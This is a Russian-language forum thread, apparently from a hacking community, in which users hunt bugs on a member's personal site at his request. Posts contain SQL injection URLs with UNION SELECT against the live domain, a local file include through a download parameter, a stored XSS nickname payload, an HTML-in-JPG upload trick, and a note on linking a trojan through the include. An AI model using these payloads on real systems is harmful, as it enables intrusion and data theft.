r0
 

http://r0.jino-net.ru
Найденный баг - мое повышение репутации =)

http://r0.jino-net.ru/comments.php?blog_id=32+order+by+5&act=comment
вот пока..
копаю дальше.

http://r0.jino-net.ru/comments.php?blog_id=32+union+select+1,version(),3 ,4,5/*&act=comment
версия бд
5.0.26-standard
копаю дальше

504 Gateway Time-out
ыыы
как я буду дальше копать когда оно ушло в даун??

BlackCats спасибо.
Done. Кто еще?
Ну я тут не при делах =)

http://r0.jino-net.ru/papers.php?down=ххх.пхп
локальный инклуд.. пишеш вместо ххх.пхп название странички и она должжна открыца так:
http://r0.jino-net.ru/ххх.пхп
хотя я незнаю что с этого можно поиметь..

ну это вроде не уязвомость, но при комментарии можно заюзать тэки вокнуг ника и icq
т.е. например я могу сделать свой ник жирным,курсивным,подчёркну тым, + ещё сделать ссылкой на чтонить - заодно этим сделав его светым.

святым? =) Нет, это не уязвимость.. по крайней мере в моем понимании =/

Не знаю,как это поможет,но я просканил сайт на уязвимости Accuntex Web Vulnerability Scaner'ом,который присвоил критический уровень сайту.Вот отчёт самых "сильных" уязвимостей скачать с рапиды

Пользователь с ником "><script>alert()</script> это круто, также нету проверки правельности ввода аськи и мыла. пароль при авторизации лучше под звездочками сделать. поле ник и пароль при регистрации почти совсем невидно.
если использовать тег юрл то получается он пытается открыть страницу http://r0.jino-net.ru/точтоввеливтег
http://r0.jino-net.ru/showusers.php
и где там юзер номер 5?)))
короче на плюс не притендую просто высказался)

=/
Что зарегали то и есть...
Ну мыла нет, а вот насчет icq .. какая может быть проверка?

Не забывем RTFM по URL


Вообще для Ваших высказываний по поводу дизайна, функционала есть отдельная тема:
http://forum.antichat.ru/thread37482.html

Этого пользователя я удалил, когда тестил админку.

Много лишнего, прошу отписываться по теме. =)

Заливаем иконку с html кодом в jpg формате.
http://r0.jino-net.ru/icons/include.jpg

ЗЫ. Открывается только в ИЕ.

Привет r0!

чё это у тя за пароль такой "xek" :D ?

я сломал,очень просто.

Стучи в pm

Вот, ну это лажа по сровнению с SQLHACK =)

Вроде подправил. Кто еще?

sqlhack
а какая уязвимость была там? интересно мне..

хех а сейчас что с сайтом , картинок половину нет.., ссылки на скачку не пашут.. ?

// ну и 404 страницу можно было добавить свою

каких картинок? картинок и небыло
ЗЫ
ты ищещ баги в картинках?

2 BlackCats
ну можно было по ссылкам пощелкать... :)


Not Found
=========================
The requested URL /razor/files/Enjoythesilence.zip was not found on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.7a PHP/5.2.1 FrontPage/5.0.2.2634 mod_perl/2.0.3 Perl/v5.8.5 Server at www.rdata.name Port 80
=========================================

http://www.rdata.name/razor/files/Enjoythesilence.zip
http://www.rdata.name/razor/files/Neuda4nijDenTolika.zip
http://www.rdata.name/razor/files/craagle.zip
http://www.rdata.name/razor/files/amama.zip

с главной http://www.rdata.name/razor/thoughts/070525_092556.jpg
http://www.rdata.name/razor/thoughts/070520_162248.jpg
http://www.rdata.name/razor/thoughts/DSC00068.JPG
http://www.rdata.name/razor/thoughts/happy.jpg


кстатти такая тема тоже катит

http://www.rdata.name/files.php?down=/img/header.gif

2r0
Я бы на твоём месте давал прямые линки, потому что можно будет тебя "подставить", например, указав ссылку на троян или сплойт таким образом :
http://rdata.name/papers.php?down=http://site.ru/troyan.exe

Картинок нет потому что на jino-net работают, видимо, ленивцы =(
Я Вас не понимаю. Какие в этом уязвимости ?
Логично. +